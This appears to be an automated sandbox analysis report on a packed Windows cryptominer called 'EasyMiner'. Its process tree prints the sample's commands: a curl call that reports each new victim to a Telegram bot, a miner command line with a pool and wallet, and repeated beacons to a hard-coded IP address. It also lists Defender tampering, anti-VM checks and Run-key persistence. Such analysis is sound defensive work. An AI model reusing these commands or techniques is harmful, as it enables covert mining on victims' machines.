Analysis

  • max time kernel
    158s
  • max time network
    161s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    11-02-2022 05:01

General

  • Target

    b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe

  • Size

    5.2MB

  • MD5

    a3578b5feeea4db90bcb5315f769e84d

  • SHA1

    436a4a014f91c138ed9019c58c5c98ada78a7f4f

  • SHA256

    b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

  • SHA512

    535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Executes dropped EXE 17 IoCs
  • Checks BIOS information in registry 2 TTPs 34 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Themida packer 57 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 17 IoCs
  • Checks whether UAC is enabled 1 TTPs 18 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 34 IoCs
  • Suspicious use of SetThreadContext 34 IoCs
  • Drops file in Windows directory 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 45 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe
    "C:\Users\Admin\AppData\Local\Temp\b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe"
    1⤵
    • Checks BIOS information in registry
    • Adds Run key to start application
    • Checks whether UAC is enabled
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4052
    • C:\Windows\SYSTEM32\curl.exe
      curl "https://api.telegram.org/bot5061239852:AAEeHA8AgcWGoZHszoBHCLNqDLAR4913X8k/sendMessage?chat_id=-1001645483216&text=%F0%9F%99%88 New worker!%0AGPU: Microsoft Basic Display Adapter%0AWorker Tag: EasyMiner%0A(Windows Defender has been turned off)"
      2⤵
        PID:3736
      • C:\Windows\bfsvc.exe
        C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
        2⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        PID:3428
      • C:\Windows\explorer.exe
        C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:3036
        • C:\Windows\SYSTEM32\curl.exe
          curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
          3⤵
            PID:528
          • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
            "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
            3⤵
            • Executes dropped EXE
            • Checks BIOS information in registry
            • Adds Run key to start application
            • Checks whether UAC is enabled
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:3608
            • C:\Windows\bfsvc.exe
              C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
              4⤵
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:2580
            • C:\Windows\explorer.exe
              C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:2224
              • C:\Windows\SYSTEM32\curl.exe
                curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
                5⤵
                  PID:1020
                • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                  "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                  5⤵
                  • Executes dropped EXE
                  • Checks BIOS information in registry
                  • Adds Run key to start application
                  • Checks whether UAC is enabled
                  • Suspicious use of SetThreadContext
                  PID:3972
                  • C:\Windows\bfsvc.exe
                    C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
                    6⤵
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    PID:2260
                  • C:\Windows\explorer.exe
                    C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
                    6⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2548
                    • C:\Windows\SYSTEM32\curl.exe
                      curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
                      7⤵
                        PID:2604
                      • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                        "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                        7⤵
                        • Executes dropped EXE
                        • Checks BIOS information in registry
                        • Adds Run key to start application
                        • Checks whether UAC is enabled
                        • Suspicious use of SetThreadContext
                        PID:1292
                        • C:\Windows\bfsvc.exe
                          C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
                          8⤵
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          PID:3916
                        • C:\Windows\explorer.exe
                          C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
                          8⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3396
                          • C:\Windows\SYSTEM32\curl.exe
                            curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
                            9⤵
                              PID:3016
                            • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                              "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                              9⤵
                              • Executes dropped EXE
                              • Checks BIOS information in registry
                              • Adds Run key to start application
                              • Checks whether UAC is enabled
                              • Suspicious use of SetThreadContext
                              PID:3152
                              • C:\Windows\bfsvc.exe
                                C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
                                10⤵
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:544
                              • C:\Windows\explorer.exe
                                C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
                                10⤵
                                  PID:1232
                                  • C:\Windows\SYSTEM32\curl.exe
                                    curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
                                    11⤵
                                      PID:1836
                                    • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                      "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                      11⤵
                                      • Executes dropped EXE
                                      • Checks BIOS information in registry
                                      • Adds Run key to start application
                                      • Checks whether UAC is enabled
                                      • Suspicious use of SetThreadContext
                                      PID:3576
                                      • C:\Windows\bfsvc.exe
                                        C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
                                        12⤵
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        PID:2804
                                      • C:\Windows\explorer.exe
                                        C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
                                        12⤵
                                          PID:1324
                                          • C:\Windows\SYSTEM32\curl.exe
                                            curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
                                            13⤵
                                              PID:3768
                                            • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                              "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                              13⤵
                                              • Executes dropped EXE
                                              • Checks BIOS information in registry
                                              • Adds Run key to start application
                                              • Checks whether UAC is enabled
                                              • Suspicious use of SetThreadContext
                                              PID:3776
                                              • C:\Windows\bfsvc.exe
                                                C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
                                                14⤵
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:1468
                                              • C:\Windows\explorer.exe
                                                C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
                                                14⤵
                                                  PID:1308
                                                  • C:\Windows\SYSTEM32\curl.exe
                                                    curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
                                                    15⤵
                                                      PID:3476
                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                      15⤵
                                                      • Executes dropped EXE
                                                      • Checks BIOS information in registry
                                                      • Adds Run key to start application
                                                      • Checks whether UAC is enabled
                                                      • Suspicious use of SetThreadContext
                                                      PID:1772
                                                      • C:\Windows\bfsvc.exe
                                                        C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
                                                        16⤵
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        PID:2160
                                                      • C:\Windows\explorer.exe
                                                        C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
                                                        16⤵
                                                          PID:3048
                                                          • C:\Windows\SYSTEM32\curl.exe
                                                            curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
                                                            17⤵
                                                              PID:3628
                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                              17⤵
                                                              • Executes dropped EXE
                                                              • Checks BIOS information in registry
                                                              • Adds Run key to start application
                                                              • Checks whether UAC is enabled
                                                              • Suspicious use of SetThreadContext
                                                              PID:3632
                                                              • C:\Windows\bfsvc.exe
                                                                C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
                                                                18⤵
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                PID:2940
                                                              • C:\Windows\explorer.exe
                                                                C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
                                                                18⤵
                                                                  PID:528
                                                                  • C:\Windows\SYSTEM32\curl.exe
                                                                    curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
                                                                    19⤵
                                                                      PID:3916
                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                                      19⤵
                                                                      • Executes dropped EXE
                                                                      • Checks BIOS information in registry
                                                                      • Adds Run key to start application
                                                                      • Checks whether UAC is enabled
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:1540
                                                                      • C:\Windows\bfsvc.exe
                                                                        C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
                                                                        20⤵
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        PID:3028
                                                                      • C:\Windows\explorer.exe
                                                                        C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
                                                                        20⤵
                                                                          PID:1588
                                                                          • C:\Windows\SYSTEM32\curl.exe
                                                                            curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
                                                                            21⤵
                                                                              PID:3284
                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                                              21⤵
                                                                              • Executes dropped EXE
                                                                              • Checks BIOS information in registry
                                                                              • Adds Run key to start application
                                                                              • Checks whether UAC is enabled
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:3492
                                                                              • C:\Windows\bfsvc.exe
                                                                                C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
                                                                                22⤵
                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                PID:868
                                                                              • C:\Windows\explorer.exe
                                                                                C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
                                                                                22⤵
                                                                                  PID:224
                                                                                  • C:\Windows\SYSTEM32\curl.exe
                                                                                    curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
                                                                                    23⤵
                                                                                      PID:3836
                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                                                      23⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks BIOS information in registry
                                                                                      • Adds Run key to start application
                                                                                      • Checks whether UAC is enabled
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:1680
                                                                                      • C:\Windows\bfsvc.exe
                                                                                        C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
                                                                                        24⤵
                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                        PID:2464
                                                                                      • C:\Windows\explorer.exe
                                                                                        C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
                                                                                        24⤵
                                                                                          PID:3992
                                                                                          • C:\Windows\SYSTEM32\curl.exe
                                                                                            curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
                                                                                            25⤵
                                                                                              PID:1292
                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                                                              25⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks BIOS information in registry
                                                                                              • Adds Run key to start application
                                                                                              • Checks whether UAC is enabled
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:3500
                                                                                              • C:\Windows\bfsvc.exe
                                                                                                C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
                                                                                                26⤵
                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                PID:1888
                                                                                              • C:\Windows\explorer.exe
                                                                                                C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
                                                                                                26⤵
                                                                                                  PID:1332
                                                                                                  • C:\Windows\SYSTEM32\curl.exe
                                                                                                    curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
                                                                                                    27⤵
                                                                                                      PID:3016
                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                                                                      27⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Adds Run key to start application
                                                                                                      • Checks whether UAC is enabled
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:3540
                                                                                                      • C:\Windows\bfsvc.exe
                                                                                                        C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
                                                                                                        28⤵
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        PID:1600
                                                                                                      • C:\Windows\explorer.exe
                                                                                                        C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
                                                                                                        28⤵
                                                                                                          PID:2700
                                                                                                          • C:\Windows\SYSTEM32\curl.exe
                                                                                                            curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
                                                                                                            29⤵
                                                                                                              PID:3028
                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                                                                              29⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Adds Run key to start application
                                                                                                              • Checks whether UAC is enabled
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:1572
                                                                                                              • C:\Windows\bfsvc.exe
                                                                                                                C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
                                                                                                                30⤵
                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                PID:1412
                                                                                                              • C:\Windows\explorer.exe
                                                                                                                C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
                                                                                                                30⤵
                                                                                                                  PID:3180
                                                                                                                  • C:\Windows\SYSTEM32\curl.exe
                                                                                                                    curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
                                                                                                                    31⤵
                                                                                                                      PID:2600
                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                                                                                      31⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Adds Run key to start application
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                      PID:224
                                                                                                                      • C:\Windows\bfsvc.exe
                                                                                                                        C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
                                                                                                                        32⤵
                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                        PID:3456
                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                        C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
                                                                                                                        32⤵
                                                                                                                          PID:2288
                                                                                                                          • C:\Windows\SYSTEM32\curl.exe
                                                                                                                            curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
                                                                                                                            33⤵
                                                                                                                              PID:780
                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                                                                                              33⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Checks BIOS information in registry
                                                                                                                              • Adds Run key to start application
                                                                                                                              • Checks whether UAC is enabled
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              PID:564
                                                                                                                              • C:\Windows\bfsvc.exe
                                                                                                                                C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
                                                                                                                                34⤵
                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                PID:3140
                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
                                                                                                                                34⤵
                                                                                                                                  PID:1588
                                                                                                                                  • C:\Windows\SYSTEM32\curl.exe
                                                                                                                                    curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
                                                                                                                                    35⤵
                                                                                                                                      PID:1180
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                                                                                                      35⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                      PID:2784
                                                                • C:\Windows\system32\MusNotifyIcon.exe
                                                                  %systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13
                                                                  1⤵
                                                                  • Checks processor information in registry
                                                                  PID:2836
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                  1⤵
                                                                  • Drops file in Windows directory
                                                                  • Modifies data under HKEY_USERS
                                                                  PID:1184

                                                                Network

                                                                MITRE ATT&CK Enterprise v6

                                                                Replay Monitor

                                                                Loading Replay Monitor...

                                                                Downloads

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                  MD5

                                                                  a3578b5feeea4db90bcb5315f769e84d

                                                                  SHA1

                                                                  436a4a014f91c138ed9019c58c5c98ada78a7f4f

                                                                  SHA256

                                                                  b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

                                                                  SHA512

                                                                  535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                  MD5

                                                                  a3578b5feeea4db90bcb5315f769e84d

                                                                  SHA1

                                                                  436a4a014f91c138ed9019c58c5c98ada78a7f4f

                                                                  SHA256

                                                                  b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

                                                                  SHA512

                                                                  535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                  MD5

                                                                  a3578b5feeea4db90bcb5315f769e84d

                                                                  SHA1

                                                                  436a4a014f91c138ed9019c58c5c98ada78a7f4f

                                                                  SHA256

                                                                  b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

                                                                  SHA512

                                                                  535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                  MD5

                                                                  a3578b5feeea4db90bcb5315f769e84d

                                                                  SHA1

                                                                  436a4a014f91c138ed9019c58c5c98ada78a7f4f

                                                                  SHA256

                                                                  b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

                                                                  SHA512

                                                                  535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                  MD5

                                                                  a3578b5feeea4db90bcb5315f769e84d

                                                                  SHA1

                                                                  436a4a014f91c138ed9019c58c5c98ada78a7f4f

                                                                  SHA256

                                                                  b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

                                                                  SHA512

                                                                  535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                  MD5

                                                                  a3578b5feeea4db90bcb5315f769e84d

                                                                  SHA1

                                                                  436a4a014f91c138ed9019c58c5c98ada78a7f4f

                                                                  SHA256

                                                                  b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

                                                                  SHA512

                                                                  535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                  MD5

                                                                  a3578b5feeea4db90bcb5315f769e84d

                                                                  SHA1

                                                                  436a4a014f91c138ed9019c58c5c98ada78a7f4f

                                                                  SHA256

                                                                  b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

                                                                  SHA512

                                                                  535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                  MD5

                                                                  a3578b5feeea4db90bcb5315f769e84d

                                                                  SHA1

                                                                  436a4a014f91c138ed9019c58c5c98ada78a7f4f

                                                                  SHA256

                                                                  b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

                                                                  SHA512

                                                                  535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                  MD5

                                                                  a3578b5feeea4db90bcb5315f769e84d

                                                                  SHA1

                                                                  436a4a014f91c138ed9019c58c5c98ada78a7f4f

                                                                  SHA256

                                                                  b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

                                                                  SHA512

                                                                  535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                  MD5

                                                                  a3578b5feeea4db90bcb5315f769e84d

                                                                  SHA1

                                                                  436a4a014f91c138ed9019c58c5c98ada78a7f4f

                                                                  SHA256

                                                                  b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

                                                                  SHA512

                                                                  535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                  MD5

                                                                  a3578b5feeea4db90bcb5315f769e84d

                                                                  SHA1

                                                                  436a4a014f91c138ed9019c58c5c98ada78a7f4f

                                                                  SHA256

                                                                  b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

                                                                  SHA512

